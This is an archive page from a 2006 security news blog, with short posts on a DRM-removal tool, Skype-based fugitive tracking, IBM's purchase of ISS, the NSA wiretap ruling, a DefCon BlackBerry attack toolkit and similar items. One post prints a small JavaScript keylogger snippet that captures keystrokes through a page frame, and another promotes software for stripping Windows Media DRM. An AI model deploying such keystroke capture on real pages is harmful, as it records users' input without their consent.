The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Archive for August, 2006

FairUse4WM – a WM/DRM removal program

Posted by Xavier Ashe on August 26, 2006

FairUse4WM is a GUI version of drmdbg that supports individualization version .3930 and some WM11 versions.

Basic requirements
1. Only works on individualized DRM file
2. Requires WM10 or WM11. Won't work on WM9.

The program's functioning can be verified with “Demo” DRM files from, as well as those from other Microsoft Solution partners.

This program is ONLY designed and intended to enable fair-use rights to PURCHASED media.
– While I haven't been able to support license expiration/rental detection, please don't use this to abuse rental license
– This code does NOT allow import of KID/SID pairs to preclude its use for piracy

Note that some WM installations will have multiple ECC key-pairs, so
you will likely have to “Extract Keys” using multiple licensed files.
If you find a file that doesn't convert, try extracting keys with it.
Once your whole set of keys is extracted, you will no longer need to
run WM per file.

Found on the forums. [via]


Posted in Security

Fugitive exec nabbed after Skype call

Posted by Xavier Ashe on August 25, 2006

Kobi Alexander, the founder of Comverse, was nabbed
in Negombo, Sri Lanka yesterday by a private investigator. He is wanted
by the US government in connection with financial fraud charges. He is
accused of profiting from some very shady stock-option deals, to the
detriment of Comverse shareholders. Once the deals became public and he
was indicted, he resigned as CEO and fled the US.

was traced to the Sri Lankan capital of Colombo after he placed a
one-minute call using Skype. That was enough to alert authorities to
his presence and hunt him down.

The fugitive former CEO
may have been convinced that using Skype made him safe from tracking,
but he—and everyone else that believes VoIP is inherently more secure
than a landline—was wrong. Tracking anonymous peer-to-peer VoIP traffic
over the Internet is possible (PDF). In fact, it can be done even if the parties have taken some steps to disguise the traffic.

VoIP and law enforcement have been in the news lately,
due primarily to the Communications Assistance for Law Enforcement Act.
CALEA, passed in 1994, gives the FBI the ability to easily tap landline
and cell phone calls. As written, CALEA had originally included some
exemptions for Internet-based systems, but the FBI convinced the
Federal Communications Commission that they should not apply to VoIP
traffic. As a result, VoIP operators in the US will need to make their
systems wiretap friendly.

If nothing else, Alexander's
capture reinforces the message that despite appearances, nothing we do
on the Internet is truly anonymous.

From ArsTechnica

Posted in Privacy, Security

DSAmp – Control Winamp from your DS

Posted by Xavier Ashe on August 24, 2006

The DS is a wonderful machine, capable of interacting with a PC in imaginative ways. Now the clever homebrew community has come up with a way for the DS to control Winamp. Should any of you DIY-ers out there wish to film yourself giving this a go, send us a link and like Doc Holliday, we'll make you famous.

Now how about someone coming up with a way to stream music or video from Winamp onto the DS?

From DS Fanboy.

Posted in Other Technology

HOPE 2006 Audio Available

Posted by Xavier Ashe on August 24, 2006

We now have available for your listening enjoyment all of the HOPE Number Six talks and panels. To listen, simply go to

We want to thank everyone
who helped to make HOPE Number Six the most successful HOPE conference
yet, judging from the comments we've been getting. If you'd like us to
include your comments, experiences, and feedback concerning this year's
HOPE in our post-HOPE section, send an email to
If you have pictures or videos, send them along as well. We'd also like
to hear your suggestions on how we can make things even better in 2008.

From 2600 News.

Posted in Security

Great Comic

Posted by Xavier Ashe on August 24, 2006

Posted in For Fun, Security

In 2006, China has issued 15 national security standards

Posted by Xavier Ashe on August 24, 2006

In China, network and information security have been getting increasing
attention in recent years, not only from the government and large
enterprises, but also from the whole of society. More and more relevant
standards are issued, and internal control manuals are made and
executed in FSI (Financing, Securities and Insurance) and telecom
enterprises as well to strengthen their compliance management.

Since the beginning of 2006, 15 standards have been published in
the security domain by the technical committee TC260, which is responsible for the information
security related standards under the government standardization
, the counterpart of NIST, USA.
Some of them cover the detailed management and technical requirements
for classify security protection, while some of them are updates of the
previous GB/T18336, which is the localized version of ISO15408 (CC).
Additionally, ISO17799:2000 has been adopted as GB/T19716-2005 in 2005.

From Telecom, Security and P2P blog.

Posted in Security

IBM Official Press about ISS Acquisition

Posted by Xavier Ashe on August 23, 2006

IBM (NYSE: IBM) and Internet Security Systems, Inc. (NASDAQ: ISSX)
today announced the two companies have entered into a definitive
agreement for IBM to acquire Internet Security Systems, Inc., a
publicly held company based in Atlanta, Ga., in an all-cash transaction
at a price of approximately $1.3 billion, or $28 per share. The
acquisition is subject to Internet Security Systems, Inc. shareholder
and regulatory approvals and other customary closing conditions. The
transaction is expected to close in the fourth quarter of 2006.

Following completion of the acquisition, IBM intends to:

  • Establish ISS' operations as a business unit within IBM's
    Infrastructure Management Services unit, part of IBM Global Technology
  • Integrate ISS' software technology with Tivoli's IT
    service management portfolio, which includes software for Identity
    Management, Access Management, Service Oriented Architecture (SOA)
    security and Security Information Management
  • Market and sell ISS' Managed Security Services and
    portfolio of Network, Application, Server and Endpoint Protection
    products through IBM's and ISS' worldwide sales channels and Business
  • Further expand the scope and capabilities of IBM's
    business and IT asset management consulting practices, and deliver
    services for ISS-based solutions through IBM Global Services
  • Build upon the companies' existing business relationship, which began in 1999

More information is available in the IBM Press Release.

Posted in Security

ISS, Welcome to the big Blue Family

Posted by Xavier Ashe on August 23, 2006

IBM said on Wednesday it agreed
to buy Internet Security Systems Inc. for $1.3
billion, in a move to beef up its product line in the rapidly
growing business of Internet security.

International Business Machines Corp., the world's largest
information-technology company, said it will pay $28 a share
for Internet Security, continuing an acquisition drive to fuel
growth in its software and services businesses.

The price represents a 7.7 percent premium to Internet
Security's Tuesday closing price of $26 a share on Nasdaq. The
stock rose 7 percent, or $1.82, in premarket trade.

Internet Security, which sells software and runs data
centers that help businesses protect against Internet attacks,
competes against Accenture Ltd., Check Point Software
Technologies Ltd., Cisco Systems Inc., McAfee
Inc. and Symantec Corp.

“This is something we couldn't do before because we didn't
have the software assets to provide protection against Internet
attacks,” Kristof Kloeckner, vice president of strategy and
technology for IBM's software group, said in an interview.

He said IBM plans to sell Internet Security's products as
services through its global services unit and as software
through its Tivoli software division.

This is really huge.  I am on a very busy project this week, but once I get a free second, I'll post my opinions.  Until then, read the full article on MSN Money.

Posted in Security

Web 2.0 Image Generator

Posted by Xavier Ashe on August 17, 2006

Posted in For Fun

Federal judge orders halt to NSA spy program, rules it unconstitutional

Posted by Xavier Ashe on August 17, 2006

In the first federal challenge ever argued against the Bush
administration's NSA spying program, U.S. District Court Judge Anna
Diggs Taylor rules that the program to monitor the phone calls and
e-mails of millions of Americans without warrants is unconstitutional.
Calling for a halt to this abuse of presidential power, Judge Taylor
states that “[t]here are no hereditary Kings in America and no powers
not created by the Constitution,” so all the president's “inherent
powers” must derive from the Constitution.

Just announced!  From the ACLU website.  Read the decision from the courts (PDF). Here's the CNN story.

UPDATE:  A Banner across the top on reads: The U.S. Department of Justice has announced that it will appeal a
federal judge's ruling that the government's warrantless wiretapping
program is unconstitutional.
  Guess the fight moves on.

Posted in Privacy

Israeli hackers fight Trojan dropping Iranian blog

Posted by Xavier Ashe on August 17, 2006

The Iranian website, in which Iranian officials claim the Iranian President publishes a daily journal, was down for a few hours on Monday.

Following a report by Yedioth Ahronoth on Sunday about the site, Israeli hackers called for a joint effort to hack the site.
On Monday afternoon, the site was down for an hour and in the evening the site worked alternately.

Israeli bloggers claimed Monday that the site was down because of a joint effort by thousands of Israelis to enter the site simultaneously, causing it to crash.

Despite the effort, the site was operational late Sunday evening.

From Ynet.  The reason for this is that the Iranian blog was dropping trojans for Israeli IPs.  From Caitlyn Martin's blog:

Iranian President Mahmoud Ahmadinejad now has his very own blog. That’s fine. The content is entirely what you might expect with one notable exception. Several Israeli bloggers, including Yael K.’s Step By Step, which I read regularly, report that if you access the Ahmadinejad blog
from an Israeli IP address the site sends you a little gift, a
cyberattack in the form of a virus or trojan (reports vary) designed to
exploit an Internet Explorer vulnerability.

Posted in Security

A Guide to Information Security Certifications

Posted by Xavier Ashe on August 17, 2006

Many people are confused by the massive number of information security
certifications available today. Some people already have one or more
and are looking to expand, while others are just getting started with
certification and need a place to start. This guide aims to help with
both scenarios.

I'm going to highlight a few of the certification options and offer
a couple of recommended paths for professionals in various stages of
their careers. I'll be rating each credential based on the criteria

  • Difficulty – How hard the test itself is, i.e. study-time needed, difficulty of material, etc.
  • Who – Who should be considering the certification.
  • Respect – Respect rating within the technical infosec-geek community.
  • Renown – How well-known the certification is throughout the industry.
  • Requirements – What's needed to get the cert, e.g. prerequisites, exams, practicals, labs, etc.
  • Cost – What it'll cost you (or your company) to get the credential.
  • Pros – Positive comments about the certification.
  • Cons – Downsides to the certification.
  • Comments – My own input on the credential.

Read the full review on

Posted in Security

XBox 360: Texas Hold 'em Free in Arcade

Posted by Xavier Ashe on August 17, 2006

Microsoft isn't bluffing: Log on to Xbox Live® within the first 48 hours after launch and download Texas Hold 'em
completely free of charge! This full-featured poker title for Xbox Live
Arcade on Xbox 360™ will launch on Wednesday, August 23, at 0800 GMT
(1:00 A.M. Pacific Time).

For 48 hours only—through 0800 GMT
(1:00 A.M. Pacific Time) Friday, August 25—as a special limited-time
only promotion, all Xbox Live Gold and Silver members can download (and
own) the game at no charge. Starting at 0801 GMT (1:01 A.M. Pacific
Time) Friday, August 25, Texas Hold 'em will be available for 800 Microsoft Points.


Posted in For Fun

Blackjacking – 0wning the Enterprise via the Blackberry

Posted by Xavier Ashe on August 17, 2006

Research in Motion's Blackberry technology has
quickly become the de facto standard for executives and technical
personnel alike to maintain untethered remote access to critical data.
Often regarded as inherently secure, most administrators deploy this
solution without a full understanding of the technology or risks

This presentation
will demonstrate how an attacker could utilize many typical corporate
blackberry deployments to directly attack machines on the internal
network—behind your perimeter defenses! The tools and source code
presented will be available for attendees. Techniques for reducing the
risks associated with this technology will also be presented.

Presentation made at DefCon 14 by Jesse D'Aguanno.  Download the PowerPoint Slides and download the Blackberry Attack Toolkit. From.

Posted in Security

Bruce Schneier facts – Chuck Norris style

Posted by Xavier Ashe on August 16, 2006

  • If Bruce Schneier wants your plaintext, he'll just squeeze it out of the ciphertext using his bare hands
  • Beyond computational complexity, there is Schneiertational complexity
  • Bruce Schneier doesn't need steganography to hide data in innocent-looking files. He just pounds it in with his fist.

Get More Bruce Schneier Facts

Posted in For Fun, Security

Xbox modder gets home detention

Posted by Xavier Ashe on August 9, 2006

Late last year, three men who worked at the ACME Game Store on Melrose Boulevard in Los Angeles were charged
with copyright infringement for selling illegally modded Xboxes. The
consoles were outfitted with special chips and larger hard drives which
allowed them to play and rip illegal copies of games. Jason Jones, the
owner of the store, has been sentenced to six months of home detention,
reports KCAL 9 News.
On top of the six months of home detention, which includes wearing an
electronic ankle bracelet to track his location, Jones will serve three
years of probation. A second man, Jonathon Bryant, will serve only the
three years probation after Jones admitted he was the sole owner of the
store. A third man, Pei Cai, remains at large and is considered a
fugitive. Jones and Bryant were also ordered to pay more than $2,600 to
the Entertainment Software Association (ESA).

From GameSpot News.

Posted in XBox Hacks

Who would win in a fight – Capt. Morgan vs Capt. Kirk?

Posted by Xavier Ashe on August 8, 2006

Posted in For Fun, Personal Note

Plausible Deniability ToolKit

Posted by Xavier Ashe on August 7, 2006

We can only hope you are viewing this via Tor. Once you are done, clear your
browser cache. Reading about Plausible Deniability should not be a crime, but
unfortunately having done so could be considered circumstantial evidence that
could be used against you.

The Plausible Deniability Toolkit is not a set of tools to download, but a
set of ideas and philosophies to adapt to protect your privacy in an
ever-increasingly scary world of eroding personal rights. The “hacker defense”
rarely works, even if it is the truth!

This idea was first proposed at DefCon 14.
The slides are available here. As the talk was just
given, please give us a few days of sobriety to add to this page, and know
there are a lot more links coming in the next few days. Feel free to send
suggestions to, but this in itself could be risky. We would
advise you to set up a Hotmail, Yahoo, or Gmail account via Tor just for this
purpose, and GPG the message if you like. We will have a pdtk GPG key in a
few days.

Plausible Deniability ToolKit

Posted in Privacy

Javascript Keylogger

Posted by Xavier Ashe on August 6, 2006


var keylog='Capturing: ';

document.onkeypress = function () {

window.status = keylog += String.fromCharCode(window.event.keyCode); }


<frameset onLoad=”this.focus();” onBlur=”this.focus();” cols=”100%,*”>

<frame src=”; scrolling=”auto”>


Any questions?  Found on

Posted in Security

Blackhat Presentations

Posted by Xavier Ashe on August 4, 2006

Click here to leech all the Blackhat presentations for everyone like me that has to work this week.

Posted in Security
